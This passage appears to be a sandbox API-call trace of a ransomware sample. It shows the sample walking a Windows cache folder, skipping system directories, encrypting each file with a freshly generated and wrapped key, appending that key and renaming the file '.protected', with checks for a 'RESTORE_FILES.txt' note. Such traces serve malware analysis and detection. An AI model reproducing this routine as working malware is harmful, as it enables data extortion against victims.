pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.172] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".txt") returned 0x0 [0089.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.172] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".rar") returned 0x0 [0089.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC") returned 152 [0089.172] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC", lpSrch=".zip") returned 0x0 [0089.172] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.173] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.173] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x204, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x204, lpOverlapped=0x0) returned 1 [0089.173] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.173] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.173] WriteFile (in: hFile=0x150, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.174] CloseHandle (hObject=0x150) returned 1 [0089.174] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected") returned 162 [0089.174] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.protected")) returned 1 [0089.175] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Windows") returned -1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files") returned -1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files (x86)") returned -1 [0089.175] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="$Recycle.bin") returned 1 [0089.175] lstrcmpiW 
(lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="System Volume Information") returned -1 [0089.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".protected") returned 0x0 [0089.175] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="RESTORE_FILES.txt") returned -1 [0089.175] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.175] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.175] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".txt") returned 0x0 [0089.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".rar") returned 0x0 [0089.175] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 152 [0089.175] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".zip") returned 0x0 [0089.176] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x192, lpOverlapped=0x0) returned 1 [0089.176] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.176] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x192, lpOverlapped=0x0) returned 1 [0089.176] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.176] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.176] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.177] CloseHandle (hObject=0x150) returned 1 [0089.177] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected") returned 162 [0089.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.protected")) returned 1 [0089.177] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Windows") returned -1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Program Files") returned -1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Program Files (x86)") returned -1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="$Recycle.bin") returned 1 [0089.178] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="System Volume Information") returned -1 [0089.178] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.178] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".protected") returned 0x0 [0089.178] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="RESTORE_FILES.txt") returned -1 [0089.178] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.178] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.178] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".txt") returned 0x0 [0089.178] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.178] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".rar") returned 0x0 [0089.178] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 152 [0089.179] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".zip") returned 0x0 [0089.179] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.179] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.179] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.180] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.180] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.180] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.180] CloseHandle (hObject=0x150) returned 1 [0089.180] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected") returned 162 [0089.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.protected")) returned 1 [0089.181] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Windows") returned -1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files") returned -1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files (x86)") returned -1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="$Recycle.bin") returned 1 [0089.181] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="System Volume Information") returned -1 [0089.181] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".protected") returned 0x0 [0089.181] lstrcmpW 
(lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="RESTORE_FILES.txt") returned -1 [0089.181] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.181] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".txt") returned 0x0 [0089.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".rar") returned 0x0 [0089.181] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 152 [0089.181] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".zip") returned 0x0 [0089.182] ReadFile 
(in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.182] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe72, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.182] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x18e, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x18e, lpOverlapped=0x0) returned 1 [0089.182] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.182] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.182] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.183] CloseHandle (hObject=0x150) returned 1 [0089.183] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected") returned 162 [0089.183] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.protected")) returned 1 [0089.183] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Windows") returned -1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files") returned -1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files (x86)") returned -1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="$Recycle.bin") returned 1 [0089.183] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="System Volume Information") returned -1 [0089.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".protected") returned 0x0 [0089.184] lstrcmpW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="RESTORE_FILES.txt") returned -1 [0089.184] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.184] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0089.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 152 [0089.184] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".txt") returned 0x0 [0089.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 